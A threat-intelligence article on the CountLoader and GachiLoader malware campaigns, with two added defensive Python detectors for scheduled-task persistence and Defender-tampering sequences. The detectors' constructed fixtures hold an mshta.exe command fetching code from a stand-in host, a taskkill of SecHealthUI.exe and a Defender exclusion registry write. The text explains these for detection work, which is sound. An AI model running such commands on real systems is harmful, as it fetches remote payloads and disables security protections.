CountLoader Malware Campaign Exploits Cracked Software Sites As New Stealthy Loader Evolves

Cybersecurity researchers have disclosed details of an active malware campaign that uses cracked-software distribution websites to spread a new version of a stealthy, modular loader known as CountLoader. According to analysis shared by the Cyderes Howler Cell Threat Intelligence team, the operation uses CountLoader as the initial foothold in a multistage intrusion built for access, evasion, and the delivery of additional malware families. The loader has been observed in real-world attacks since at least June 2025 and was previously documented by Fortinet and Silent Push for its role in deploying Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and cryptomining malware. The latest activity shows continued development of the loader and increasing care in how it is deployed.

The newly observed infection chain begins when a user tries to download a pirated copy of legitimate software such as Microsoft Word. The victim is redirected to a MediaFire link hosting a malicious ZIP archive that contains two files: a password-protected ZIP archive and a Microsoft Word document that supplies the password for it. Inside the inner archive is a renamed but legitimate Python interpreter labeled Setup.exe, which is used to run a command that fetches CountLoader version 3.2 from a remote server through mshta.exe. Once running, the loader establishes persistence by creating a scheduled task named to resemble a legitimate Google component, such as GoogleTaskSystem136.0.7023.12 (a Chrome-style version number) followed by an identifier-style string. The task runs every 30 minutes for a period of ten years, repeatedly invoking mshta.exe with a fallback command and domain, which gives the loader a second route back to its infrastructure if the first one is taken down.

Researchers noted that the malware checks whether CrowdStrike Falcon is present on the infected system by enumerating registered antivirus products through Windows Management Instrumentation (WMI). If the Falcon service is found, CountLoader changes its persistence behavior and launches mshta.exe through cmd.exe in the background; otherwise it contacts the remote server with mshta.exe directly. Either branch still ends with mshta.exe fetching remote content, so a detection keyed on mshta.exe with a URL argument, regardless of parent process, covers both. Beyond persistence, the loader profiles the compromised host and retrieves additional payloads. Version 3.2 adds propagation through removable USB drives and in-memory execution through mshta.exe or PowerShell. The malware can download and execute EXE, ZIP, DLL, and MSI payloads, remove its own scheduled task, collect extensive system information, and spread by hiding the legitimate files on removable media and placing malicious shortcuts alongside them, so that a user opening what looks like their own file launches the loader. In the campaign Cyderes examined, the final payload was ACR Stealer, an information stealer that harvests sensitive data from infected systems.
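A hunt for the persistence described in the two paragraphs above, written as an added example (this is not Cyderes' or the loader's own code). It parses Task Scheduler XML as exported by schtasks /query /xml /tn <name> and flags the three traits the article gives: a GoogleTaskSystem name with a version-style suffix, an mshta.exe action (run directly or via cmd.exe) that fetches remote content, and a high-frequency repetition with a multi-year duration. The two task documents are constructed to resemble a suspect and a benign task; the URL, the exact cmd.exe arguments, and the benign task's contents are assumptions.

```python
"""Hunt Task Scheduler XML for the CountLoader persistence pattern.
Added example: parses schtasks /query /xml output; the two task
documents below are constructed, not real captures."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# "GoogleTaskSystem" plus a Chrome-style version; a trailing identifier is allowed.
MIMIC_NAME = re.compile(r"GoogleTaskSystem\d+(?:\.\d+)+", re.I)
ISO_DURATION = re.compile(
    r"^P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")
REMOTE_URL = re.compile(r"https?://\S+", re.I)
MSHTA = re.compile(r"\bmshta(?:\.exe)?\b", re.I)
CMD_SHELL = re.compile(r"\bcmd(?:\.exe)?\b", re.I)
MINUTES_PER_YEAR = 365 * 24 * 60


def duration_minutes(iso):
    """ISO 8601 duration (PT30M, P10Y, P3650D) to minutes; 365-day years and
    30-day months are precise enough for threshold checks. Unparseable -> 0."""
    m = ISO_DURATION.match(iso or "")
    if not m:
        return 0
    y, mo, d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return ((y * 365 + mo * 30 + d) * 24 + h) * 60 + mi + s / 60


def _text(node, path):
    found = node.find(path, TASK_NS)
    return (found.text or "").strip() if found is not None else ""


def analyze_task_xml(xml_text, task_name=""):
    """Return a list of findings for one exported task; [] means nothing flagged.
    Real exports are UTF-16 with a matching declaration: pass the raw bytes."""
    root = ET.fromstring(xml_text)
    name = task_name or _text(root, "t:RegistrationInfo/t:URI").lstrip("\\")
    findings = []

    if MIMIC_NAME.search(name):
        findings.append(f"name mimics a Google component: {name}")

    # Every Exec action: mshta.exe run directly, or wrapped in cmd.exe (the
    # branch the loader takes when CrowdStrike Falcon is present).
    for exec_node in root.findall("t:Actions/t:Exec", TASK_NS):
        cmd = _text(exec_node, "t:Command")
        args = _text(exec_node, "t:Arguments")
        if MSHTA.search(f"{cmd} {args}"):
            url = REMOTE_URL.search(args)
            findings.append(
                "mshta.exe action"
                + (" via cmd.exe" if CMD_SHELL.search(cmd) else "")
                + (f" fetching remote content: {url.group(0)}" if url else ""))

    # Any trigger that repeats at high frequency for years is a persistence smell.
    for rep in root.findall("t:Triggers/*/t:Repetition", TASK_NS):
        interval = duration_minutes(_text(rep, "t:Interval"))
        duration = duration_minutes(_text(rep, "t:Duration"))
        if 0 < interval <= 60 and duration >= MINUTES_PER_YEAR:
            findings.append(
                f"repeats every {interval:g} min for {duration / MINUTES_PER_YEAR:.1f} years")
    return findings


# Constructed: shaped like the task the article describes. URL and cmd.exe
# arguments are assumptions, not captured values.
SUSPECT_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleTaskSystem136.0.7023.12</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><Duration>P10Y</Duration></Repetition>
      <StartBoundary>2025-06-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>cmd.exe</Command>
      <Arguments>/c mshta.exe https://fallback.example.invalid/i</Arguments></Exec>
  </Actions>
</Task>"""

# Constructed benign task: a nightly script with no repetition and no mshta.
BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Backup\NightlyBackup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
    <Arguments>-File C:\Scripts\backup.ps1</Arguments></Exec></Actions>
</Task>"""


if __name__ == "__main__":
    for label, xml in (("suspect", SUSPECT_TASK), ("benign", BENIGN_TASK)):
        print(label, analyze_task_xml(xml) or "clean")
```

Feed each task's export to analyze_task_xml. A task that scores on the mshta.exe and repetition checks together is worth inspecting even when the name does not match, since the name is the easiest trait for the operators to change.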

The disclosure coincided with findings from Check Point on another loader campaign involving a heavily obfuscated JavaScript-based malware called GachiLoader. Written for Node.js, GachiLoader is distributed through what researchers describe as a YouTube Ghost Network: compromised YouTube accounts used to spread malware through video descriptions and links. As many as 100 videos linked to the operation accumulated roughly 220,000 views and were uploaded from 39 hijacked accounts, with activity dating back to December 22, 2024. Many of the videos have since been removed by Google. One observed GachiLoader variant deploys a second-stage malware known as Kidkadi, which uses a novel Portable Executable injection method: it loads a legitimate DLL and abuses Vectored Exception Handling to replace it with the malicious payload during execution.

Further analysis showed that GachiLoader can deliver information stealers such as Rhadamanthys. The loader performs multiple anti-analysis checks, tests whether it is running with elevated privileges by invoking the net session command (which fails with an access-denied error unless the caller is an administrator), and relaunches itself with administrative rights if required. That relaunch triggers a User Account Control prompt, which victims tend to approve because the malware is disguised as a popular software installer. In later stages it attempts to terminate SecHealthUI.exe, the Windows Security app process associated with Microsoft Defender, and adds Defender exclusion paths so that malicious components stored in common system directories are not scanned. Researchers noted that the techniques used by GachiLoader reflect a strong understanding of Windows internals and underscore a broader trend toward signed-binary abuse, fileless execution, and sophisticated evasion in modern malware operations.
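Detection logic for the sequence just described, as an added example that is not Check Point's code. It runs over a constructed, Sysmon-like event list (process creation and registry set events, reduced to five fields) and attributes each indicator to the root of its process lineage, so the net session probe, the Defender exclusion write, and the SecHealthUI.exe kill from one installer add up to a single alert, while a lone net session from an administrator's shell does not. The registry path under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions is the one Defender actually uses; the use of taskkill.exe for the kill, the image paths, and the PIDs are assumptions.

```python
"""Lineage-scored detection for the GachiLoader-style sequence.
Added example; the events below are constructed in a simplified
Sysmon-like layout, not a real capture."""
import re
from collections import defaultdict, namedtuple

# kind: "ProcessCreate" (detail = command line) or "RegistrySet" (detail = target object)
Event = namedtuple("Event", "kind pid ppid image detail")

# Real Defender exclusion key; Paths/Processes/Extensions are its three subkeys.
DEFENDER_EXCLUSION = re.compile(
    r"\\Microsoft\\Windows Defender\\Exclusions\\(?:Paths|Processes|Extensions)\\", re.I)
NET_SESSION = re.compile(r"\bnet1?(?:\.exe)?\s+session\b", re.I)
# Assumption: the article does not say how SecHealthUI.exe is terminated;
# taskkill and Stop-Process are the two common command-line routes.
SECHEALTHUI_KILL = re.compile(
    r"(?:taskkill\b.*\bSecHealthUI\.exe|Stop-Process\b.*SecHealthUI)", re.I)

INDICATORS = (
    # (name, weight, predicate). net session alone is weak: admins run it too.
    ("net_session_probe", 1,
     lambda e: e.kind == "ProcessCreate" and NET_SESSION.search(e.detail)),
    ("defender_exclusion_write", 3,
     lambda e: e.kind == "RegistrySet" and DEFENDER_EXCLUSION.search(e.detail)),
    ("sechealthui_kill", 3,
     lambda e: e.kind == "ProcessCreate" and SECHEALTHUI_KILL.search(e.detail)),
)
ALERT_THRESHOLD = 4  # a strong indicator plus at least one other step


def build_parents(events):
    return {e.pid: e.ppid for e in events if e.kind == "ProcessCreate"}


def root_of(pid, parents):
    """Walk the parent chain to the oldest process we saw being created."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        if parents[pid] not in parents:
            return pid
        pid = parents[pid]
    return pid


def analyze(events):
    """Map each lineage root pid to its score and the indicators that fired."""
    parents = build_parents(events)
    report = defaultdict(lambda: {"score": 0, "indicators": []})
    for e in events:
        for name, weight, match in INDICATORS:
            if match(e):
                entry = report[root_of(e.pid, parents)]
                entry["score"] += weight
                entry["indicators"].append(f"{name}: pid {e.pid} {e.detail}")
    return dict(report)


def flagged(events):
    return sorted(pid for pid, r in analyze(events).items() if r["score"] >= ALERT_THRESHOLD)


# Constructed sample. PIDs, image paths and the installer name are assumptions.
SAMPLE_EVENTS = [
    # Suspect lineage rooted at pid 4100: a fake installer run from Downloads.
    Event("ProcessCreate", 4100, 900, r"C:\Users\u\Downloads\Popular_App_Setup.exe", "Popular_App_Setup.exe"),
    Event("ProcessCreate", 4120, 4100, r"C:\Windows\System32\net.exe", "net session"),
    # Relaunched copy after the UAC prompt is approved.
    Event("ProcessCreate", 4150, 4100, r"C:\Users\u\Downloads\Popular_App_Setup.exe", "Popular_App_Setup.exe"),
    Event("RegistrySet", 4150, 4100, r"C:\Users\u\Downloads\Popular_App_Setup.exe",
          r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp"),
    Event("ProcessCreate", 4170, 4150, r"C:\Windows\System32\taskkill.exe", "taskkill /F /IM SecHealthUI.exe"),
    # Benign lineage rooted at pid 5000: an administrator checking SMB sessions.
    Event("ProcessCreate", 5000, 700, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    Event("ProcessCreate", 5010, 5000, r"C:\Windows\System32\net.exe", "net session"),
]


if __name__ == "__main__":
    for root, r in analyze(SAMPLE_EVENTS).items():
        print(root, r["score"], "ALERT" if root in flagged(SAMPLE_EVENTS) else "ok", r["indicators"])
```

Scoring per lineage rather than per event is what keeps the administrator's net session below the threshold while still letting it count as the first step once an exclusion write or a SecHealthUI.exe kill lands in the same tree.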
